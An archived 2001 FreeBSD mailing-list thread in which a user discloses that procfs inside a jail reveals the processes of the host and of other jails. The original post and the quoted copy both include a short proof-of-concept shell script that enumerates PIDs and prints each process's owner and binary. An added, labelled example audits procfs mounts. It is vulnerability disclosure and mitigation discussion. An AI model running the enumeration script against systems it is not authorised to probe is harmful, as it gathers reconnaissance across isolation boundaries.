Re: jail's /proc

2001-10-30 Thread Robert Watson


This is fixed in 5.0-CURRENT, but the architectural improvements to
support the fix have not been merged, since they're still in flux.  My
general advice is to not mount procfs on systems with untrusted users. 
It's almost possible to not lose functionality in doing that -- I
understand DES has patches to truss to make it use ptrace(), which is the
last remaining instance I can think of.

(actually, I think ps -e requires procfs still)

Robert N M Watson FreeBSD Core Team, TrustedBSD Project
[EMAIL PROTECTED]  NAI Labs, Safeport Network Services

On Mon, 29 Oct 2001, opr wrote:

>
> Hello,
>
> I really have no clue if I should mail this to you guys, but we've found some
> issues in the jail's /proc. We were able to find information about processes running
> outside the jail, or running in other jails.
> E.g. when I run sshd in the host system, and it has PID 655, I can log in on the jail,
> and by executing "ls -l /proc/665/file" I can see what binary is running on pid 655.
> So any user of the jail system can see what processes you run on that server. I'm
> running FreeBSD 4.4-RELEASE on an i386.
> 
> greetz,
> 
> Pieter Danhieux
> 
> Proof of concept shellscript:
> 
> #!/bin/sh
> # Walk the PID range and report the owner and binary of each /proc/<pid>/file.
> _COUNT=0;
> while [ $_COUNT -le 65000 ];
> do
> if [ -f /proc/$_COUNT/file ];
> then
>  _USER=`/bin/ls -l /proc/$_COUNT/file | cut -d" " -f4`;
>  _PROC=`/bin/ls -l /proc/$_COUNT/file | cut -d" " -f14`;
>  echo "PID= $_COUNT USER= $_USER PROC= $_PROC";
> fi
> _COUNT=`expr $_COUNT + 1`;
> done
> 
> -
> [www.bsdaemon.be] 
> -
> 
> 
> To Unsubscribe: send mail to [EMAIL PROTECTED]
> with "unsubscribe freebsd-hackers" in the body of the message
> 
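
The advice in the reply above is to not mount procfs on systems with untrusted users. As an added example (not part of the thread and not FreeBSD project code), the function below reads fstab-format lines, as `mount -p` prints them on FreeBSD, and reports each procfs mount and whether it sits under a jail root. The jail root paths and the sample mount table are constructed for illustration.

```shell
#!/bin/sh
# Added example: list procfs mounts and mark those under a jail root.
# The jail roots passed in are hypothetical paths chosen for this example.

find_procfs_mounts() {
    # $1   : space-separated list of jail root directories
    # stdin: "device mountpoint fstype options dump pass", one mount per line
    # stdout: "HOST <mountpoint>" or "JAIL <mountpoint>" per procfs mount
    jail_roots="$1"
    while read -r _dev mnt fstype _rest; do
        # Skip blank lines and comments.
        case "$_dev" in ''|'#'*) continue ;; esac
        [ "$fstype" = "procfs" ] || continue
        scope=HOST
        for root in $jail_roots; do
            # Match only mount points strictly below the jail root.
            case "$mnt" in "${root%/}"/*) scope=JAIL ;; esac
        done
        echo "$scope $mnt"
    done
}

# Constructed sample input in the format of `mount -p`.
sample_mounts() {
    cat <<'EOF'
# constructed sample mount table
/dev/ad0s1a   /                     ufs     rw  1 1
proc          /proc                 procfs  rw  0 0
/dev/ad0s1e   /usr/jails            ufs     rw  2 2
proc          /usr/jails/www/proc   procfs  rw  0 0
EOF
}

audit_sample() {
    sample_mounts | find_procfs_mounts "/usr/jails/www /usr/jails/mail"
}

# On a live host: mount -p | find_procfs_mounts "$JAIL_ROOTS"
audit_sample
```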





jail's /proc

2001-10-29 Thread opr


Hello,

I really have no clue if I should mail this to you guys, but we've found some issues
in the jail's /proc. We were able to find information about processes running outside
the jail, or running in other jails.
E.g. when I run sshd in the host system, and it has PID 655, I can log in on the jail,
and by executing "ls -l /proc/665/file" I can see what binary is running on pid 655.
So any user of the jail system can see what processes you run on that server. I'm
running FreeBSD 4.4-RELEASE on an i386.

greetz,

Pieter Danhieux

Proof of concept shellscript:

#!/bin/sh
# Walk the PID range and report the owner and binary of each /proc/<pid>/file.
_COUNT=0;
while [ $_COUNT -le 65000 ];
do
if [ -f /proc/$_COUNT/file ];
then
 _USER=`/bin/ls -l /proc/$_COUNT/file | cut -d" " -f4`;
 _PROC=`/bin/ls -l /proc/$_COUNT/file | cut -d" " -f14`;
 echo "PID= $_COUNT USER= $_USER PROC= $_PROC";
fi
_COUNT=`expr $_COUNT + 1`;
done

-
[www.bsdaemon.be] 
-

